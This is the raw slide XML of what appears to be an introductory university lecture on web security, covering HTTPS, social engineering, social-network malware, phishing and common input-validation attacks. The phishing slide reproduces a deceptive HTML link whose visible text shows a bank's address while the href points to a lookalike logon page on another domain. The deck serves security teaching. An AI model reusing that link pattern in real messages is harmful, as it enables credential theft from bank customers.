            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="0" kern="0" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Protecting data as it is passed over the Internet</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12293" name="Picture 13">
            <a:hlinkClick r:id="rId3"/>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11188" y="2636838"/>
            <a:ext cx="3482975" cy="396081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16" name="Oval Callout 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1042988" y="1916113"/>
            <a:ext cx="1873250" cy="720725"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeEllipseCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -20833"/>
              <a:gd name="adj2" fmla="val 62500"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1200"/>
              <a:t>The https protocol is used </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Oval Callout 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2987675" y="2997200"/>
            <a:ext cx="1728788" cy="1223963"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeEllipseCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -20833"/>
              <a:gd name="adj2" fmla="val 62500"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:endParaRPr lang="en-GB" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3203575" y="3213100"/>
            <a:ext cx="1439863"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1200"/>
              <a:t>Clicking on the “lock” icon gives information about the certificate</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11278" name="Picture 1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787900" y="2636838"/>
            <a:ext cx="3352800" cy="3960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checkerboard(across)">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="18"/>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checkerboard(across)">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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1268">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="checkerboard(across)">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11268">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>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11278"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="checkerboard(across)">
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11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p:bldP spid="16" grpId="0" animBg="1"/>
      <p:bldP spid="18" grpId="0" animBg="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Social engineering</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26627" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Security attacks based on human weakness</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can be the easiest way into a system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Don</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US"/>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>t underestimate their power</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>People are generally willing to help</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>People are often gullible and suggestive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651943" y="188640"/>
            <a:ext cx="6304433" cy="1321073"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Malware spreading </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>               through Facebook</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1433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000250"/>
            <a:ext cx="6048375" cy="452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40" name="TextBox 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7359650" y="6453188"/>
            <a:ext cx="174942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a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Source: Zeltser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117848" y="476672"/>
            <a:ext cx="7198568" cy="710654"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Another Facebook example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1536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1352550"/>
            <a:ext cx="6896100" cy="517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64" name="TextBox 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7359650" y="6453188"/>
            <a:ext cx="180022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a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Source: nuwarp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043806" y="404664"/>
            <a:ext cx="7488634" cy="843880"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Gathering data via social networks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16387" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>LinkedIn example </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1638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12838" y="2781300"/>
            <a:ext cx="7131050" cy="2735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89" name="TextBox 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7359650" y="6453188"/>
            <a:ext cx="174942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a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Source: Zeltser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1224136" y="620688"/>
            <a:ext cx="6732240" cy="652934"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Phishing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17411" name="Text Placeholder 9"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1341438"/>
            <a:ext cx="4040188" cy="639762"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="1">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Phishing e-mail </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17412" name="Text Placeholder 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5102225" y="1341438"/>
            <a:ext cx="4041775" cy="639762"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="1">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Behind the image?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17413" name="Content Placeholder 11"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5102225" y="1981200"/>
            <a:ext cx="4041775" cy="3951288"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>&lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>= "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>http://www.chambily.com/axel/.web/www.abbey.co.uk/myonlineaccounts2.abbeynational.co.uk/CentralLogonWeb/Logon.htm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>" </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>http://www.abbey.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>/&lt;/a&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" sz="2400" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17414" name="Picture 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="email">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="3397" t="20277" r="26283" b="12502"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="2020888"/>
            <a:ext cx="5072063" cy="394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checkerboard(across)">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="174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7413">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="checkerboard(across)">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="17413">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7413">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="checkerboard(across)">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="17413">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>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7413">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="checkerboard(across)">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="174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1D9E8-ED95-7F4F-9CF2-1C7D4C9A4A57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In this lecture</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB2E8AA6-0635-DB41-A6BB-63CFA2A26B51}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Why security?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Hacking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Making hacking difficult</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Layered defenses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Encryption</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Input validation </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Protecting users from cross site scripting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>The law</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3042848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Most common attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28675" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Input validation </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>SQL injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Cross-site scripting (XSS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Directory traversal</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47887" y="404664"/>
            <a:ext cx="6808489" cy="817017"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Input validation attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31747" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="611560" y="1981200"/>
            <a:ext cx="4092203" cy="4114800"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:lumMod val="10000"/>
              <a:lumOff val="90000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:effectLst>
            <a:outerShdw blurRad="63500" dist="38100" dir="2700000" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="42998"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Send data the application does not expect</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Intentions include:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Data disclosure or modification</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>System compromise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Denial of Service (DoS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Arbitrary command execution</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
